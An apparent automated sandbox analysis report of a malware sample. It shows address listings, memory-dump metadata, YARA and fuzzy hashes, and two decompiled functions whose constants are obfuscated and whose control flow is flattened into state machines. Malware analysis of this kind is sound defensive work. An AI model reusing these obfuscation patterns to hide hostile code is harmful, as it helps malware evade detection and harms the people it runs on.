                                          0x006d2db7
                                          0x006d2dbb
                                          0x006d2dc3
                                          0x006d2dcb
                                          0x006d2dd3
                                          0x006d2ddb
                                          0x006d2de3
                                          0x006d2deb
                                          0x006d2df6
                                          0x006d2e01
                                          0x006d2e0c
                                          0x006d2e14
                                          0x006d2e1c
                                          0x006d2e21
                                          0x006d2e29
                                          0x006d2e31
                                          0x006d2e3e
                                          0x006d2e47
                                          0x006d2e4b
                                          0x006d2e53
                                          0x006d2e5b
                                          0x006d2e60
                                          0x006d2e64
                                          0x006d2e6c
                                          0x006d2e74
                                          0x006d2e7c
                                          0x006d2e86
                                          0x006d2e8a
                                          0x006d2e92
                                          0x006d2e9a
                                          0x006d2e9f
                                          0x006d2ea7
                                          0x006d2eaf
                                          0x006d2eb7
                                          0x006d2ec4
                                          0x006d2ec8
                                          0x006d2ed0
                                          0x006d2ed8
                                          0x006d2ee0
                                          0x006d2ee8
                                          0x006d2ef0
                                          0x006d2ef8
                                          0x006d2f00
                                          0x006d2f08
                                          0x006d2f10
                                          0x006d2f18
                                          0x006d2f1f
                                          0x006d2f29
                                          0x006d2f2e
                                          0x006d2f36
                                          0x006d2f3e
                                          0x006d2f48
                                          0x006d2f4c
                                          0x006d2f54
                                          0x006d2f5c
                                          0x006d2f64
                                          0x006d2f6c
                                          0x006d2f7a
                                          0x006d2f7e
                                          0x006d2f82
                                          0x006d2f8a
                                          0x006d2f8a
                                          0x006d2f8c
                                          0x00000000
                                          0x006d2f8d
                                          0x006d2f9f
                                          0x006d30a3
                                          0x006d30aa
                                          0x006d3193
                                          0x006d319e
                                          0x006d31a0
                                          0x006d3094
                                          0x006d3094
                                          0x006d2f8a
                                          0x006d2f8a
                                          0x006d2f8c
                                          0x00000000
                                          0x006d2f8c
                                          0x006d2f8a
                                          0x006d30b0
                                          0x006d30b8
                                          0x006d30e1
                                          0x006d30e1
                                          0x006d30e9
                                          0x006d30eb
                                          0x006d30f8
                                          0x006d30fd
                                          0x006d312e
                                          0x006d315f
                                          0x006d3164
                                          0x006d3175
                                          0x006d317e
                                          0x006d317e
                                          0x006d30da
                                          0x006d30da
                                          0x00000000
                                          0x006d30da
                                          0x006d30ba
                                          0x006d30c3
                                          0x00000000
                                          0x00000000
                                          0x006d30c5
                                          0x006d30cd
                                          0x00000000
                                          0x00000000
                                          0x006d30cf
                                          0x006d30d8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006d30d8
                                          0x006d2fa7
                                          0x006d3081
                                          0x006d308c
                                          0x006d308e
                                          0x006d308e
                                          0x00000000
                                          0x006d308e
                                          0x006d2fb3
                                          0x006d300c
                                          0x006d3044
                                          0x006d305d
                                          0x006d3062
                                          0x006d3065
                                          0x006d2f8a
                                          0x006d2f8a
                                          0x006d2f8c
                                          0x00000000
                                          0x006d2f8c
                                          0x006d2f8a
                                          0x006d2fbb
                                          0x006d3005
                                          0x00000000
                                          0x006d3005
                                          0x006d2fc3
                                          0x006d31cc
                                          0x006d31cc
                                          0x006d31d2
                                          0x00000000
                                          0x00000000
                                          0x006d31e1
                                          0x006d31e1
                                          0x006d31e1
                                          0x006d2feb
                                          0x006d2ff0
                                          0x006d2ff2
                                          0x006d2ff8
                                          0x00000000
                                          0x00000000
                                          0x006d2ffe
                                          0x00000000
                                          0x006d2ffe
                                          0x006d31bc
                                          0x006d31c1
                                          0x006d31c4
                                          0x006d31cb
                                          0x00000000
                                          0x006d31cb

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
                                          • API String ID: 0-983689062
                                          • Opcode ID: b92c49d20b95d13e8a7ce97004494747eabce3830e22ef00dbe14e9fda45c7b0
                                          • Instruction ID: ee0c00cda8715282afd3cc424ef2a62d38e15424b609078040c9f5abbe44bfbe
                                          • Opcode Fuzzy Hash: b92c49d20b95d13e8a7ce97004494747eabce3830e22ef00dbe14e9fda45c7b0
                                          • Instruction Fuzzy Hash: 64F103719083819FD368CF61C549A5BFBE2FBC4358F108A1DF29A862A0D7B58949CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C88E5, Relevance: 11.5, Strings: 9, Instructions: 298COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E006C88E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E006D0D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E006C29E3(_t382 + 0x2b0, 0x104, E006D889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E006D2025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E006D3E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E006C28CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E006D4F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E006D6CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E006CB566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}













                                          0x006c88eb
                                          0x006c88f3
                                          0x006c88fb
                                          0x006c8900
                                          0x006c8905
                                          0x006c890d
                                          0x006c8915
                                          0x006c891d
                                          0x006c8925
                                          0x006c8935
                                          0x006c8937
                                          0x006c8942
                                          0x006c8944
                                          0x006c8949
                                          0x006c8952
                                          0x006c895d
                                          0x006c8962
                                          0x006c896a
                                          0x006c8972
                                          0x006c897a
                                          0x006c8982
                                          0x006c8987
                                          0x006c898f
                                          0x006c899c
                                          0x006c899f
                                          0x006c89a3
                                          0x006c89ab
                                          0x006c89b3
                                          0x006c89bb
                                          0x006c89c3
                                          0x006c89cb
                                          0x006c89d3
                                          0x006c89e3
                                          0x006c89e7
                                          0x006c89ef
                                          0x006c89f7
                                          0x006c89ff
                                          0x006c8a07
                                          0x006c8a0f
                                          0x006c8a14
                                          0x006c8a1c
                                          0x006c8a24
                                          0x006c8a2c
                                          0x006c8a34
                                          0x006c8a3c
                                          0x006c8a41
                                          0x006c8a46
                                          0x006c8a4e
                                          0x006c8a5b
                                          0x006c8a5c
                                          0x006c8a66
                                          0x006c8a6a
                                          0x006c8a72
                                          0x006c8a7a
                                          0x006c8a7f
                                          0x006c8a84
                                          0x006c8a8c
                                          0x006c8a94
                                          0x006c8a9c
                                          0x006c8aa4
                                          0x006c8aac
                                          0x006c8ab4
                                          0x006c8abc
                                          0x006c8ac1
                                          0x006c8acb
                                          0x006c8ad3
                                          0x006c8ae8
                                          0x006c8ae9
                                          0x006c8af0
                                          0x006c8afb
                                          0x006c8b08
                                          0x006c8b0c
                                          0x006c8b14
                                          0x006c8b1c
                                          0x006c8b27
                                          0x006c8b2f
                                          0x006c8b3a
                                          0x006c8b42
                                          0x006c8b47
                                          0x006c8b4f
                                          0x006c8b54
                                          0x006c8b5c
                                          0x006c8b70
                                          0x006c8b77
                                          0x006c8b82
                                          0x006c8b8a
                                          0x006c8b92
                                          0x006c8b97
                                          0x006c8b9f
                                          0x006c8baa
                                          0x006c8bb2
                                          0x006c8bbd
                                          0x006c8bc5
                                          0x006c8bcd
                                          0x006c8bd2
                                          0x006c8bd7
                                          0x006c8bdf
                                          0x006c8be7
                                          0x006c8bf4
                                          0x006c8bf8
                                          0x006c8c00
                                          0x006c8c08
                                          0x006c8c10
                                          0x006c8c15
                                          0x006c8c1a
                                          0x006c8c22
                                          0x006c8c2a
                                          0x006c8c32
                                          0x006c8c3a
                                          0x006c8c42
                                          0x006c8c47
                                          0x006c8c51
                                          0x006c8c55
                                          0x006c8c5d
                                          0x006c8c65
                                          0x006c8c6d
                                          0x006c8c75
                                          0x006c8c7d
                                          0x006c8c85
                                          0x006c8c8d
                                          0x006c8c95
                                          0x006c8c9d
                                          0x006c8cb0
                                          0x006c8cb7
                                          0x006c8cc2
                                          0x006c8cca
                                          0x006c8ccf
                                          0x006c8cd7
                                          0x006c8cdf
                                          0x006c8ce7
                                          0x006c8cef
                                          0x006c8cf4
                                          0x006c8cf9
                                          0x006c8d01
                                          0x006c8d17
                                          0x006c8d1e
                                          0x006c8d21
                                          0x006c8d28
                                          0x006c8d33
                                          0x006c8d3b
                                          0x006c8d43
                                          0x006c8d4b
                                          0x006c8d53
                                          0x006c8d5b
                                          0x006c8d68
                                          0x006c8d6c
                                          0x006c8d71
                                          0x006c8d79
                                          0x006c8d79
                                          0x006c8d8b
                                          0x006c8ecd
                                          0x006c8ee0
                                          0x006c8ee5
                                          0x006c8ee8
                                          0x00000000
                                          0x006c8d91
                                          0x006c8d97
                                          0x006c8e4f
                                          0x006c8ea1
                                          0x006c8eb3
                                          0x006c8eb7
                                          0x006c8ebc
                                          0x006c8ebf
                                          0x00000000
                                          0x006c8d9d
                                          0x006c8da3
                                          0x006c8e45
                                          0x00000000
                                          0x006c8da9
                                          0x006c8daf
                                          0x006c8e17
                                          0x006c8e2e
                                          0x006c8e33
                                          0x006c8e36
                                          0x006c8e3b
                                          0x006c8e3d
                                          0x00000000
                                          0x006c8db1
                                          0x006c8db7
                                          0x006c8f65
                                          0x006c8dbd
                                          0x006c8dc3
                                          0x00000000
                                          0x006c8dc9
                                          0x006c8dd0
                                          0x006c8dee
                                          0x006c8df5
                                          0x006c8df8
                                          0x006c8df9
                                          0x006c8e00
                                          0x00000000
                                          0x006c8e00
                                          0x006c8dc3
                                          0x006c8db7
                                          0x006c8daf
                                          0x006c8da3
                                          0x006c8d97
                                          0x006c8f6b
                                          0x006c8f77
                                          0x006c8f77
                                          0x006c8f30
                                          0x006c8f35
                                          0x006c8f37
                                          0x006c8f3a
                                          0x006c8f3d
                                          0x006c8f49
                                          0x00000000
                                          0x006c8f3f
                                          0x006c8f3f
                                          0x00000000
                                          0x006c8f3f
                                          0x00000000
                                          0x006c8f4e
                                          0x006c8f4e
                                          0x006c8f4e
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
                                          • API String ID: 2962429428-1096774584
                                          • Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                          • Instruction ID: bdb47491ff62bd602baa6367c20d2685c25a50681857700204554caef834244c
                                          • Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                          • Instruction Fuzzy Hash: 46F110725083809FD368CF65C48AA5BFBE2BBC4748F10891DF1DA962A0C7B58949CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D26F5, Relevance: 11.5, Strings: 9, Instructions: 225COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D26F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E006C1132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E006C2A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E006D6DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E006CF536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x6dca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x6dca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E006C76DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E006C8736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
